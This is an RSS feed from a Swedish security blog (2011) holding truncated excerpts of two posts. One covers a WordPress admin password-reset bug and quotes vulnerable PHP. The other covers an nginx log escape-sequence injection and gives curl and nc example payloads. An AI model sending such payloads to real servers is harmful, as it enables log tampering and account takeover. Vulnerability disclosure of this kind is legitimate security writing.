<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
> <channel><title>GSOC &#187; bugg</title> <atom:link href="http://gsoc.se/tag/bugg/feed/" rel="self" type="application/rss+xml" /><link>http://gsoc.se</link> <description>Säkerhet, Internetmarknadsföring</description> <lastBuildDate>Tue, 08 Nov 2011 21:23:03 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" /> <item><title>WordPress exploit</title><link>http://gsoc.se/wordpress-exploit.html</link> <comments>http://gsoc.se/wordpress-exploit.html#comments</comments> <pubDate>Tue, 01 Nov 2011 01:33:32 +0000</pubDate> <dc:creator>admin</dc:creator> <category><![CDATA[GSOC]]></category> <category><![CDATA[bugg]]></category> <category><![CDATA[exploit]]></category> <category><![CDATA[lösenord]]></category> <category><![CDATA[wordpress]]></category> <guid
isPermaLink="false">http://gsoc.se/?p=744</guid> <description><![CDATA[Idag släpptes en PoC på en bugg i alla WordPress under 2.8.3, så alla är sårbara. Den går ut på att du kan resetta admin lösenordet utan någon som helst konfirmation. Nedan är källkoden som är sårbar: wp-login.php: &#8230;[snip]&#8230;. line 186: function reset_password($key) { global $wpdb; $key = preg_replace(&#8216;/[^a-z0-9]/i&#8217;, &#8221;, $key); if ( empty( $key [...]]]></description> <wfw:commentRss>http://gsoc.se/wordpress-exploit.html/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>nginx exploit</title><link>http://gsoc.se/nginx-exploit.html</link> <comments>http://gsoc.se/nginx-exploit.html#comments</comments> <pubDate>Sat, 15 Oct 2011 17:30:09 +0000</pubDate> <dc:creator>admin</dc:creator> <category><![CDATA[GSOC]]></category> <category><![CDATA[bugg]]></category> <category><![CDATA[exploit]]></category> <category><![CDATA[it-säkerhet]]></category> <category><![CDATA[nginx]]></category> <category><![CDATA[säkerhet]]></category> <guid
isPermaLink="false">http://gsoc.se/?p=806</guid> <description><![CDATA[Fick mail i dagarna om en &#8221;Terminal Escape Sequence in Logs Command Injection Vulnerability&#8221; i nginx vilket var intressant, särskillt då exempelvis wordpress.com använder sig av nginx för lastbalansering. Dock är det bara nginx 0.7.64 som är sårbar. Exempel 1: curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a Exempel 2: echo -en &#8221;GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d&#8221; > payload nc localhost 80 < [...]]]></description> <wfw:commentRss>http://gsoc.se/nginx-exploit.html/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> </channel> </rss>
